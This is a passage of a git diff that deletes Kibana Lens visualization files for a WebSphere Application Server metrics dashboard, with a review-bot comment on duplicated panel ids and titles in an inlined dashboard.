{ + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:bb425378-17d3-46b5-aab3-d274bdd9f097", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "83e5353e-78da-4523-8a4a-d370afc2eefa:indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "396f488f-0d3c-44c2-bd13-312d9db09222:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "396f488f-0d3c-44c2-bd13-312d9db09222:indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "396f488f-0d3c-44c2-bd13-312d9db09222:10b45b12-77b4-4241-a864-55c5b313cd40", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 0ef67642c19..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9.json +++ /dev/null 
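Review bot: The inlined "Created sessions" panel (panelIndex `396f488f-0d3c-44c2-bd13-312d9db09222`) reuses the same layer id `0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c` and column id `b0fcb1bb-3640-4710-bb39-4e7ac9985961` as the "Active sessions" panel (`db58d5f2-b5da-43f9-9a53-3dfe2151b7ad`), only with a different `label` and `sourceField`. The dashboard-level `references` keep them apart solely through the panelIndex prefix, which presumably works for by-value panels, but it means two visually unrelated panels now share internal ids inside one saved object and it is worth confirming the import does not collapse or cross-wire them. Separately, that panel still carries a panel-level `"title": "Created sessions [Metrics WebSphere Application Server]"` next to an identical `attributes.title`; the override was meaningful when the lens was by-reference, and now one of the two can be dropped to avoid the pair drifting apart.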
@@ -1,172 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "79027b05-459f-4773-823b-238f4e0b907a": { - "columnOrder": [ - "407e0b68-66ae-43db-a9e3-86e632694e6b", - "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", - "a6370094-15b2-4777-ac22-fe0612a6d34f", - "1dc49faf-ed90-489c-94cc-b145a28cba19" - ], - "columns": { - "1dc49faf-ed90-489c-94cc-b145a28cba19": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Persistent Stores Data Read", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.persistent_stores.data_read" - }, - "407e0b68-66ae-43db-a9e3-86e632694e6b": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.session_manager.app_name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1dc49faf-ed90-489c-94cc-b145a28cba19", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.session_manager.app_name" - }, - "a6370094-15b2-4777-ac22-fe0612a6d34f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Persistent Stores Data Written", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"websphere_application_server.session_manager.persistent_stores.data_written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a6370094-15b2-4777-ac22-fe0612a6d34f", - "1dc49faf-ed90-489c-94cc-b145a28cba19" - ], - "layerId": "79027b05-459f-4773-823b-238f4e0b907a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", - "xAccessor": "407e0b68-66ae-43db-a9e3-86e632694e6b", - "yConfig": [ - { - "color": "#087dea", - "forAccessor": "a6370094-15b2-4777-ac22-fe0612a6d34f" - }, - { - "color": "#60c06d", - "forAccessor": "1dc49faf-ed90-489c-94cc-b145a28cba19" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Persistent Store Data Read and Written [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json
deleted file mode 100644
index b2e4f8ff282..00000000000
--- a/packages/websphere_application_server/kibana/lens/websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1.json
+++ /dev/null
@@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5cb0751e-cee8-41d7-a221-1c89264c3c7e": { - "columnOrder": [ - "acf862f8-f0e1-482c-a70d-1599b559ba14", - "005f5de3-8a9a-4e48-8f85-293f2a8b283a", - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" - ], - "columns": { - "005f5de3-8a9a-4e48-8f85-293f2a8b283a": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.operations_calls: *" - }, - "isBucketed": false, - "label": "Total operations calls", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.total.operations_calls" - }, - "acf862f8-f0e1-482c-a70d-1599b559ba14": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.operations_calls \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": 
true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" - ], - "layerId": "5cb0751e-cee8-41d7-a221-1c89264c3c7e", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "005f5de3-8a9a-4e48-8f85-293f2a8b283a", - "xAccessor": "acf862f8-f0e1-482c-a70d-1599b559ba14" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Operation Calls [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json deleted file mode 100644 index 1cbf4272bea..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd.json +++ /dev/null 
@@ -1,67 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "39707dfa-c5ec-473f-8d7f-43c96a9beaef": { - "columnOrder": [ - "17f33a89-5e4f-4b62-a12e-ea9870e908ac" - ], - "columns": { - "17f33a89-5e4f-4b62-a12e-ea9870e908ac": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Errors", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.errors" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.errors : * " - }, - "visualization": { - "accessor": "17f33a89-5e4f-4b62-a12e-ea9870e908ac", - "layerId": "39707dfa-c5ec-473f-8d7f-43c96a9beaef", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Number of Errors [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index bdc9ebc7ee5..00000000000 
--- a/packages/websphere_application_server/kibana/lens/websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1.json
+++ /dev/null
@@ -1,196 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6a787cb2-6500-4f46-bcc0-56ba379b2ec1": { - "columnOrder": [ - "6e346b5c-b6b3-4e66-ad29-3621b6165b6c", - "9c631c61-9a76-4650-90fe-b481257c028e", - "25cdb2ff-2d42-4703-9419-2375ef16c439", - "00acb34f-ae34-439a-9cb7-45a09bb69e15", - "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "e7bed513-0fe1-460d-affc-4186777ff41a" - ], - "columns": { - "00acb34f-ae34-439a-9cb7-45a09bb69e15": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.closed: *" - }, - "isBucketed": false, - "label": "Closed Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.closed" - }, - "03351030-51ad-4c19-9e9e-9a550b2e23e4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.allocated: *" - }, - "isBucketed": false, - "label": "Allocated Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.allocated" - }, - "25cdb2ff-2d42-4703-9419-2375ef16c439": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.created: *" - }, - "isBucketed": false, - "label": "Created Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.created" - }, - "6e346b5c-b6b3-4e66-ad29-3621b6165b6c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - 
"sourceField": "@timestamp" - }, - "9c631c61-9a76-4650-90fe-b481257c028e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "e7bed513-0fe1-460d-affc-4186777ff41a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.returned: *" - }, - "isBucketed": false, - "label": "Returned Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.returned" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.created \u003e 0 or websphere_application_server.jdbc.connection.closed \u003e 0 or websphere_application_server.jdbc.connection.allocated \u003e 0 or websphere_application_server.jdbc.connection.returned \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "25cdb2ff-2d42-4703-9419-2375ef16c439", - "00acb34f-ae34-439a-9cb7-45a09bb69e15", - "03351030-51ad-4c19-9e9e-9a550b2e23e4", - "e7bed513-0fe1-460d-affc-4186777ff41a" - ], - "layerId": "6a787cb2-6500-4f46-bcc0-56ba379b2ec1", - "layerType": "data", - "position": "top", - "seriesType": "area", - 
"showGridlines": false, - "splitAccessor": "9c631c61-9a76-4650-90fe-b481257c028e", - "xAccessor": "6e346b5c-b6b3-4e66-ad29-3621b6165b6c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Created, Closed, Allocated and Returned Connections [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index 87955f1810a..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null 
@@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "093d1982-684a-40db-bed9-9426559b90ee": { - "columnOrder": [ - "5df21f55-a6e2-439c-a15d-3d1d63f30b67", - "aaf7723c-6ca8-4015-864d-8263d7488d72", - "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" - ], - "columns": { - "5df21f55-a6e2-439c-a15d-3d1d63f30b67": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a2c8801f-9e82-4502-a4db-8290bf4b4b7e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.free: *" - }, - "isBucketed": false, - "label": "Free Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.free" - }, - "aaf7723c-6ca8-4015-864d-8263d7488d72": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "a2c8801f-9e82-4502-a4db-8290bf4b4b7e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 
"a2c8801f-9e82-4502-a4db-8290bf4b4b7e" - ], - "layerId": "093d1982-684a-40db-bed9-9426559b90ee", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "aaf7723c-6ca8-4015-864d-8263d7488d72", - "xAccessor": "5df21f55-a6e2-439c-a15d-3d1d63f30b67" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Free Connections [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 64882b5679f..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c135b7c4-fd05-4a15-84d3-a959e24b077b": { - "columnOrder": [ - "a9009677-9999-4611-8f21-9a19fe50cda2", - "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", - "91f4b685-d7b8-469f-b496-143f0f130cfe" - ], - "columns": { - "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "91f4b685-d7b8-469f-b496-143f0f130cfe", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "91f4b685-d7b8-469f-b496-143f0f130cfe": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.cleared: *" - }, - "isBucketed": false, - "label": "Cleared Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.cleared" - }, - "a9009677-9999-4611-8f21-9a19fe50cda2": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.cleared : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
"labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "91f4b685-d7b8-469f-b496-143f0f130cfe" - ], - "layerId": "c135b7c4-fd05-4a15-84d3-a959e24b077b", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", - "xAccessor": "a9009677-9999-4611-8f21-9a19fe50cda2" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Number of Cleared Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 5d48d3e5fd2..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693": { - "columnOrder": [ - "7a5b1405-0e12-4508-82c5-9ffa9ba35996", - "c4075f33-09c9-4c38-af7e-190f5b70398e", - "816bda95-3cd2-410e-b17c-8ba494196cf4" - ], - "columns": { - "7a5b1405-0e12-4508-82c5-9ffa9ba35996": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "816bda95-3cd2-410e-b17c-8ba494196cf4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.stopped.declared: *" - }, - "isBucketed": false, - "label": "Declared Stopped Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.stopped.declared" - }, - "c4075f33-09c9-4c38-af7e-190f5b70398e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "816bda95-3cd2-410e-b17c-8ba494196cf4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.stopped.declared : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - 
"yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "816bda95-3cd2-410e-b17c-8ba494196cf4" - ], - "layerId": "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "c4075f33-09c9-4c38-af7e-190f5b70398e", - "xAccessor": "7a5b1405-0e12-4508-82c5-9ffa9ba35996" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Declared Stopped Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json deleted file mode 100644 index 6029eae8b57..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1.json +++ /dev/null 
@@ -1,141 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "f73c674c-32f9-437c-9556-c02eef1a0871": { - "columnOrder": [ - "c4abbc8f-c0f8-43de-aae9-ceeff9026807", - "880644a5-cf8e-4cd1-a607-0982600b03fa", - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" - ], - "columns": { - "880644a5-cf8e-4cd1-a607-0982600b03fa": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.jdbc.data_source", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.jdbc.data_source" - }, - "c4abbc8f-c0f8-43de-aae9-ceeff9026807": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.in_use: *" - }, - "isBucketed": false, - "label": "Total Connections In Use", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.jdbc.connection.total.in_use" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.jdbc.connection.total.in_use \u003e0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
